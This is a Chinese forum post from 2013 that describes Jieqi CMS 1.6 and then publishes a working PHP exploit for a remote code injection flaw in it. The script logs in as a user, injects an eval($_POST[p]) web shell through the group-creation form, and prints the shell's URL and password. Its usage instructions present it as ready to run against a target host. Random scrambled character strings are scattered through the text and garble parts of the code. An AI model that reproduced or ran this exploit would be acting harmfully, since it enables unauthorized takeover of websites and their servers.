杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。# \2 \8 o w6 y9 W/ @: X
1 w" `) r C* v' L
0 T7 b4 e( e2 l. `8 h该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。- m4 G& ]) r5 E0 ?; Z3 k
需要有一个能创建圈子的用户。( |; {/ g( K! P
) b; h2 i2 B& K# F% p<?php! ~' g1 R- b. l% Y& H: F
# C( Q+ B& l, R3 I4 f" fprint_r('$ Q2 U7 i# \) ~8 C
+---------------------------------------------------------------------------+! f! F5 v' J, E! `
Jieqi CMS V1.6 PHP Code Injection Exploit; [, A' }. Y" `' [+ d2 R o4 Z
by flyh4t
& k8 q. Y2 w7 R5 v/ h" V9 Zmail: phpsec at hotmail dot com/ z A2 a0 K8 ~; t! E, P
team: http://www.wolvez.org
+ x" J1 D6 @" r. o$ |+---------------------------------------------------------------------------+, D: @" e Y% Q5 B; w7 I
'); /**
$ w+ g) B, A' J2 w! K, \1 q5 ~ * works regardless of php.ini settings* t' [7 N6 i5 i) a
*/ if ($argc < 5) { print_r('& d v, H) b( }7 |4 i' i
+---------------------------------------------------------------------------+
" A* G6 I/ d$ i+ [' ]Usage: php '.$argv[0].' host path username* U/ `6 {4 V& x# J6 B: c
host: target server (ip/hostname)
* Y$ W5 ^- O2 I" {( r; j6 tpath: path to jieqicms ! w5 \/ s" @- c- P
uasename: a username who can create group! G+ m0 h0 I! T/ j' N* c6 k7 {& O$ O
Example:
1 P! R0 F* ?- b( K1 B4 A: K( pphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
8 a) G8 M+ P/ o+---------------------------------------------------------------------------+
3 a) p+ w5 b; F, _$ z1 b, h3 o'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
3 q* y& W& P/ x$ }4 YContent-Disposition: form-data; name="gname"
- `2 w) T" T4 [
( i: |+ l0 f8 v \'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
+ z$ @) w/ R/ E- y# j' K% H-----------------------------23281168279961+ j% X; C Q( F: i% n1 l ^5 ^
Content-Disposition: form-data; name="gcatid"2 d( d7 B5 I, O. D1 {% x; [
4 n6 }: i4 E: S
12 E& x5 v/ ~7 Q+ P0 Y f4 \
-----------------------------23281168279961
* u. L7 n$ }9 d d& r+ a0 ~+ }Content-Disposition: form-data; name="gaudit"1 [5 h& y# }: D) Q& r; J
( |. B% ?/ X p3 i
14 S8 T8 ]+ w" D* p" Y1 q
-----------------------------232811682799613 O; K d2 V T) I( X4 I. z! T
Content-Disposition: form-data; name="gbrief"
) [. {% Z) Z0 Y' @& f ! \2 z* p5 a% |0 Z) r
19 k+ l4 p# r. |7 d8 {' ]7 \8 l
-----------------------------23281168279961--- P! L/ ^$ v/ z6 E5 R
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
4 C, v/ D, Q' |$ M 5 g B. u6 z1 {% Y3 D8 z
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对